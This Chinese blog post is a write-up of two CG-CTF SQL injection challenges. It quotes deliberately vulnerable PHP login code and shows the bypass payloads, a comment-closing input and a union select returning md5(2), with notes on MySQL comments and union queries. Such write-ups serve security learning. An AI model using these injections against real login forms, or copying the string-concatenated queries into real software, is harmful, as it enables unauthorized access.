mysql注入ctf_CG-CTF SQL注入

最新推荐文章于 2021-02-07 15:50:16 发布
最新推荐文章于 2021-02-07 15:50:16 发布
阅读量481 收藏 1
点赞数
文章标签: mysql注入ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35618196/article/details/113301276
版权
这篇博客详细介绍了两个CTF挑战中的MySQL注入问题。第一个挑战中,通过利用注释符来闭合SQL查询,绕过pass验证,成功获取flag。第二个挑战中,借助union查询,构造了一个使strcasecmp函数返回0的条件,从而达到登录目标。博客还讲解了strcasecmp函数和union查询的基本原理。
摘要由CSDN通过智能技术生成

SQL注入1

题目

c012a2883fc50650a67610c14ed86dd3.png

访问题目网址

277817366abd2c6f351782d14588a890.png

先查看一下源码

9d451c44a73b545ec782ccf2a3d20d73.png

仔细分析一下核心源码

if($_POST[user] && $_POST[pass]) { //判断user和pass两个变量不为空

mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); //连接数据库

mysql_select_db(SAE_MYSQL_DB); //选择要使用的库

$user = trim($_POST[user]); //去除输入的user变量两侧的空白字符

$pass = md5(trim($_POST[pass])); //去除pass变量两侧空白字符再进行md5加密

$sql="select user from ctf where (user='".$user."') and (pw='".$pass."')"; //根据输入的user和pass构造查询语句

echo ''.$sql; //回显查找语句

$query = mysql_fetch_array(mysql_query($sql)); //使用构造的查询语句查询数据库并返回结果集

if($query[user]=="admin") {

echo "

Logged in! flag:********************

";

}

if($query[user] != "admin") {

echo("

You are not admin!

");

} //判断结果集中的user参数对应的值是不是admin,如果是返回flag,不是则返回 You are not admin!

}

echo $query[user]; //回显查询到的user值

?>

通过分析源码知道了user的值为admin,因为sql查询语句里有and,必须and前后同时成立才可以查询,但是现在不知道pass对应的值,所以考虑能不能不判断pass,直接判断user,于是想到是不是可以将user判断语句闭合并注释后面的内容,这样就不会对pass进行判断,pass就直接输入111,于是构造下面的语句。

40107e9c49add9afd04225493ef2c59f.png

这样的话查询语句就变成了

select user from ctf where (user='admin') #') and (pw='111')

尝试提交看看会不会返回flag。

dd40c87db587bc810230b4940930dcc5.png

成功拿到flag

补充:Mysql的注释语句有三种

1./* */

注释一段内容,这里明显不适用。

2.--

注释-- 后的语句直到行尾,注意这里的--后面要有一个空格,但是题目中使用了trim()函数去除空格,所以也不适用。

3.#

注释#后的语句直到行尾。

SQL注入2

题目

bcdf014a8b489e8e2bd9e9f412369b5e.png

访问题目网址

1ab394f5ab74e3a551dab52f4192e2b4.png

还是先查看一下源码

243b977231a3199a06dc556d03fb2b82.png

分析核心源码

if($_POST[user] && $_POST[pass]) {

mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);

mysql_select_db(SAE_MYSQL_DB);

$user = $_POST[user];

$pass = md5($_POST[pass]);

$query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));

if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {

echo "

Logged in! Key: ntcf{**************}

";

}

else {

echo("

Log in failure!

");

}

}

?>

找到最关键的语句

if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {

echo "

Logged in! Key: ntcf{**************}

";

}

else {

echo("

Log in failure!

");

}

解题思路:

1.可以看到这里只对密码进行了对比,没有进行user的对比,所以应该考虑怎么使得$query[pw]存在且strcasecmp($pass, $query[pw]))为假。

2.$query[pw]是MySQL查询结果集中的值,只要MySQL语句返回值即可存在。

要使strcasecmp($pass, $query[pw])为假,就要使得$pass的值小于等于$query[pw](比较ASCII码)。$pass是我们输入值的md5值,$query[pw]是数据库中的正确密码。因为$pass是md5值,32位,而$query[pw]不知道,所以看看能不能将$query[pw]的值构造成我们需要的32位,且大于$pass的值,根据题目的提示,考察union联合查询,尝试构造如下语句:

select pw from ctf where user=''union select md5(2)#'

这个语句的输出因为闭合了user,user为空,查不到任何值,而后面select md5(2),则会返回2的md5值,所以返回的结果会变成下面这样:

+----------------------------------+

| pw |

+----------------------------------+

| c81e728d9d4c2f636f067f89cc14862c |

+----------------------------------+

这样从$query[pw]查询到的值就会变成2的md5值,这时我密码输入2,这样经过strcasecmp()函数的对比会返回0,达到目的。

b8a6ce7768a0e668900400b65ebb676a.png

626eb45e6b7706a2f19175815981a933.png

成功拿到flag

补充:

1.strcasecmp(str1,str2)函数

strcasecmp(str1,str2)函数返回的结果是比较两个字符串的ASCII码,从第一位开始,相等就比较下一位,如果比较过程中,一旦出现str1的某一个字符的ASCII码和str2的不等,那么将返回这两个字符的ASCII码值之差。

718c61190dfcafc12d56e1631472e113.png

2.union联合查询

当使用union联合查询时,前一个select查询的列名将会作为输出结果的列名,后一个select只会返回查询列的内容,而没有列名。

union前后查询列名一致

mysql> select * from t2;

+----+-------+

| id | score |

+----+-------+

| 1 | 33 |

+----+-------+

1 row in set (0.00 sec)

mysql> select * from t5;

+-----------+---------+------+

| user | pw | id |

+-----------+---------+------+

| admin | 000000 | NULL |

| admin2 | 1000000 | NULL |

| gubeiqing | gu | 10 |

+-----------+---------+------+

3 rows in set (0.00 sec)

mysql> select id from t2 union select id from t5;

+------+

| id |

+------+

| 1 |

| NULL |

| 10 |

+------+

3 rows in set (0.00 sec)

union前后查询列名不一致

mysql> select * from t2;

+----+-------+

| id | score |

+----+-------+

| 1 | 33 |

+----+-------+

1 row in set (0.00 sec)

mysql> select * from t5;

+-----------+---------+------+

| user | pw | id |

+-----------+---------+------+

| admin | 000000 | NULL |

| admin2 | 1000000 | NULL |

| gubeiqing | gu | 10 |

+-----------+---------+------+

3 rows in set (0.00 sec)

mysql> select id from t2 union select pw from t5;

+---------+

| id |

+---------+

| 1 |

| 000000 |

| 1000000 |

| gu |

+---------+

4 rows in set (0.00 sec)

葫芦芦Oo
关注
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 699
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
mysql注入ctf_CTF比赛中SQL注入的一些经验总结
weixin_32334681的博客
01-20 763
*本文原创作者:pupiles,本文属FreeBuf原创奖励计划,未经许可禁止转载ctfsql注入下的一些小技巧最近花了一点时间总结了各大平台中注入的trick,自己还是太菜了,多半都得看题解,就特此做了一个paper方便总结注释符以下是Mysql中可以用到的单行注释符:#-- -;%00以下是Mysql中可以用到的多行注释符(mysql下需要闭合):/*`判断当前库是否有字段名对于CTF中的题...
mysql注入ctf_CTFsql注入(1)
weixin_30451613的博客
01-28 393
题目地址:http://chinalover.sinaapp.com/web6/index.php由图可知,此处给出了源码,源码如下:分析源码:页面中输入的参数传到php中,if()对user和pass都进行了是否为空值的判断,若都不为空,则来连接数据库。然后再把页面中的user值赋值给 $user ,把页面中的pass值md5加密后赋值给 $pass ,最后拼接sql语句并执行。而要让flag成...
mysql注入ctf_CTFSQL注入详解
weixin_29117805的博客
01-20 993
前言:最近打算玩一下CTF,玩过CTF的都知道SQL注入CTF中最重要的题型。但是。。。。。。。。。很多大佬的WP都是一阵操作猛如虎。很多都不带解释的(大佬觉得简单所以就不解释了=_= =_= =_=)。所以这几天一直都在看关于SQL注入的文章,一直也不理解SQL注入的原理。今天刚好看到了一篇文章,自己也跟着那个博主的思路总结一下,对SQL注入有了一个大概的的理解。写这篇博文一是希望加深自己对S...
mysql注入ctf_CTF考点总结-sql注入
weixin_36488760的博客
01-28 1150
整理下sql相关知识,查漏补缺(长期更新)常用语句及知识information_schema包含了大量有用的信息,例如下图mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码当前用户:select user()数据库版本:select version() , select @@versi...
CG-CTF SQL Injection
venu_s的博客
11-25 667
SQL Injection 题目 2.进入题目所给的场景,我们会看见如下图的内容 3.查看一下源码 <!-- #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $...
mysql 南邮ctf_南邮CTF平台WEB题writeup
weixin_39596739的博客
02-07 2633
https://cgctf.nuptsast.com/login1.签到题F12查看网页源代码就有flag2.md5 collision附上题目给的源代码md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) {echo ...
CG-CTF 综合题2(sql注入绕过、注入技巧、preg_replace()漏洞)☆
Sea_Sand息禅
03-19 5844
这道题确实综合性挺强的。 1、老程序,先收集信息。 页面可以输入的地方可以输入些信息试试,搜索框输入1,会转到so.php,这里是有sql查询的。 留言的地方,输入可以转到preview.php,预览之后转到say.php。 最下面有个“本CMS说明”,这个点击之后会得到更多的信息: config.php index.php passencode.php say.php sm.txt 还给了我们...
南邮ctf nctf CG-CTF web题writeup
XQin9T1an的博客
08-03 3020
0x01 签到题 题目链接:http://chinalover.sinaapp.com/web1/ 查看源码可得到flag flag:nctf{flag_admiaanaaaaaaaaaaa} 0x02 md5 collision 题目链接:http://chinalover.sinaapp.com/web19/ 题目给了源码 $md51 = md5('QNKCDZO'); $a = @$_G...
CG-CTF web刷题记录
qq_45130960的博客
11-17 1402
这里刚入门ctf小白一枚 如果有什么地方说错了或者有待改进的地方欢迎指出喔(-w-) 1.签到题 KEY在哪里? 在网页源码里~fn+F12查看网页源码收获flag一枚 2.签到2 打开题目我们看到题目让给我们输入口令:zhimakaimen 可是输入了之后依然报错呢F12看一下网页源代码 在maxlength处限制了我们输入字符的长度 我们将它改成11 重新输入 “zhimakaimen” ...
mysql注入ctf_CTFsql注入(2)
weixin_42487737的博客
01-28 289
环境:sql-labs-master ,且在该数据库中设置flag表并储存 flag{ victory! } 值补充知识点:union select 1,group_concat(table_name), 3 from information_schema.tables where table_schema=database()group_concat():把相同一组拼接起来,也仅限于拼接后...
mysql注入ctf_CTF—WEB—sql注入之宽字节注入
weixin_34565946的博客
02-02 242
宽字节注入宽字节注入是利用mysql的一个特性,mysql在使用GBK编码(GBK就是常说的宽字节之一,实际上只有两字节)的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围),而当我们输入有单引号时会自动加入\进行转义而变为\’(在PHP配置文件中magic_quotes_gpc=On的情况下或者使用addslashes函数,icov函数,mysql_real_esc...
mysql注入ctf_[ctfhub]SQL注入
weixin_34471172的博客
01-25 646
今天在ctfhub整理了几个sql注入的解题过程,还算是比较详细的。知识点都是比较常见的:每个题大致涉及的知识点用一张表格解释!注:下方的 information_schema.xxxxxxxxxxxxxx皆表示 information_schema库下的表如:schemata、tables等,不作特殊说明的都指information库下的数据表还有此处的题是ctfhub整合好的,所以所有的数据库...
mysql注入ctf_【CTF-Web Learning 1】0x01 SQL注入之宽字节注入
weixin_39776817的博客
01-28 169
0x01 前言准备系统梳理和总结提高这一年所学的关于Web方面东西,如有问题欢迎指点。在计算机中,字符的表示与存储都离不开编码。例如ASCII,utf-8,gbk2312等。通常字符的表示都只需1字节。但也有如gbk2312这种需要2字节来表示的编码格式,这种我们称之为宽字节。所谓宽字节注入,可能存在于以gbk编码存储数据的sql数据库中。在实际站点中已经比较少见(常见于学校远古破站),而且修复方...
CTF中的MYSQL注入(持续更新)
uglyfisher的博客
05-25 1213
jarvis OJ login抓包得到提示"select * from `admin` where password='".md5($pass,true)."'",参考文章https://joychou.org/web/SQL-injection-with-raw-MD5-hashes.html
CTF mysql
热门推荐
艺博东的博客
10-05 1万+
难度系数: ★★★★★ 题目来源: XCTF 题目描述: 我们在Mysql数据库中存放了flag,但是黑客已经把它删除了。你能找回来flag吗? 题目场景: 暂无 题目附件: 附件1 1、附件1 链接:https://pan.baidu.com/s/12RPRNl7PPgNBLpLatI68Fw 提取码:q57k 2、文件 3、把文件拷贝到 kail Linux 环境 4、点击空白处,鼠标右键—>在这里打开终端 5、strings:在对象文件或二进制文件中查找可打印的字符串。 用法:strin
MySQL select
weixin_33681778的博客
04-06 88
SQL_CACHE:   期望查询从Query_Cache 中取值、而不是去表中查找。当然如果查询缓存中没有的话它就要从表中找了。 SQL_NO_CACHE:   不允许查询从缓存中取值、而是直接从表中查找。 SQL_BUFFER_RESULT:   把查询结果缓存起来、下次好用。  ...
mysql is fashion ctf_一道CTF题引发的思考-MySQL的几个特性
weixin_39645019的博客
01-20 151
0x01 背景前天在做一道CTF题目时一道盲注题,其实盲注也有可能可以回显数据的,如使用DNS或者HTTP等日志来快速的获取数据,MYSQL可以利用LOAD_FILE()函数读取数据,并向远程DNS主机发送数据信息,此时DNS日志文件中就会有盲注语句的查询结果。这里不做这部分的讨论,只是说下有这种方法,在这道题目中我是使用常规的盲注的方式获取数据的。其中遇到有以下几个问题:过滤规则的判断与绕过...
mysqlSQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入在Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值